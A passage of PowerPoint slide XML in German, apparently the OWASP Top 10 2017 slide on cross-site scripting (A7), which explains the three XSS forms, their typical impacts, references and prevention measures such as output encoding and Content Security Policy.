              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angreifers</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gesendet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angreifer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aktuelle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Benutzersession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übernehmen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kann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anmerkung: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angreifer können XSS nutzen, um jegliche automatisierte Abwehr der Anwendung gegen Cross-Site Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (CSRF) zu umgehen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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gn="just">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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es gibt drei Formen von XSS, die üblicherweise auf die Browser des Benutzers abzielen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflektiertes XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Die Anwendung oder API beinhaltet ungeprüfte und nicht maskierte Nutzereingaben (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) als Teil des HTML-Outputs. Ein erfolgreicher Angriff erlaubt es einem Angreifer, beliebiges HTML und JavaScript im Browser des Opfers auszuführen. Typischerweise wird ein Anwender dazu einen schädlichen Link aufrufen müssen, der auf eine vom Angreifer kontrollierte Seite zeigt, z.B. infizierte populäre Websites (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Watering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Hole), Werbung oder vergleichbares.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistentes XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Die Anwendung oder API speichert unbereinigten Nutzer-Input der zu einem späteren Zeitpunkt von einem anderen Nutzer oder Administrator angezeigt wird. Persistentes XSS wird oft als hohes oder kritisches Risiko eingeschätzt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM-basiertes (lokales) XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Frameworks, Single-Page-Anwendungen und APIs, die vom Angreifer kontrollierte Daten dynamisch einbinden, sind für DOM-basiertes XSS anfällig. Im Idealfall würde die Anwendung keine vom Angreifer kontrollierten Daten an unsichere JavaScript APIs senden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typische XSS-Angriffe sind Diebstahl von Sessions, Übernahme von Accounts, MFA-Bypass-Angriffe, DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replacements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defacements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (wie betrügerische Login-Seiten), Angriffe gegen den Browser des Nutzer wie schädliche Software-Downloads, Key-Logger und andere Client-basierte Angriffe.</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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</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 </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Encode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Validate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Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: V5</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Testing Guide: Testing for Reflected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Testing for Stored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DOM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Cheat Sheet: DOM based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Cheat Sheet: XSS Filter Evasion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Java Encoder Project</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans"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CWE-79: Improper neutralization of user supplied input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5"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>: Client-side template injection</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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Um XSS zu verhindern, müssen nicht vertrauenswürdige Daten von aktiven Browserinhalten getrennt werden. Das kann erreicht werden durch:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE"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Verwendung von Frameworks, die XSS automatisch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE"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br>
            <a:r>
              <a:rPr lang="de-DE"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t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Design) maskieren, wie z.B. das aktuellste Ruby on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Rails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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JS. Lernen Sie die Einschränkungen des XSS-Schutzes jedes Frameworks kennen und sorgen Sie für eine angemessene Behandlung nicht abgedeckter Fälle. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="1" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE"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Maskieren der nicht vertrauenswürdigen Daten in HTTP-Anfragen auf Grundlage des Kontexts im HTML Output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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JavaScript, CSS oder URL) zur Verhinderung von Schwachstellen mit reflektiertem und persistentem XSS. Das </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">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9"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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9"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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bietet weitere Informationen über erforderliche Maskierungs-Techniken.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea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de-DE"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Kontextsensitive Kodierung bei der Modifikation der Browserdaten auf der Client-Seite schützt vor DOM-basiertem XSS. Falls das auf diese Weise nicht vermieden werden kann, können vergleichbare kontextsensitive Maskierungs-Techniken auf Browser APIs angewendet werden, wie im </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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OWASP Cheat Sheet 'DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">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based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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 XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">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Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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beschrieben.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE"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Aktivierung von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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6"/>
              </a:rPr>
              <a:t>Content Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="90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6"/>
              </a:rPr>
              <a:t>Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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6"/>
              </a:rPr>
              <a:t> (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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als tiefgreifende Schutzmaßnahme gegen XSS, so lange keine anderen Schwachstellen die lokale Einbindung von Schadcode erlauben (z.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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overwrites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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oder verwundbare Bibliotheken aus verwendeten Quellen).</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A7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600039580"/>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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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1">
                        <a:solidFill>
                          <a:schemeClr val="bg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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automatisierte Tools können alle drei Formen von XSS erkennen und ausnutzen. Dafür sind </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Frameworks frei verfügbar.</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de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS ist bzgl. der Anzahl der betroffenen Anwendungen in der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
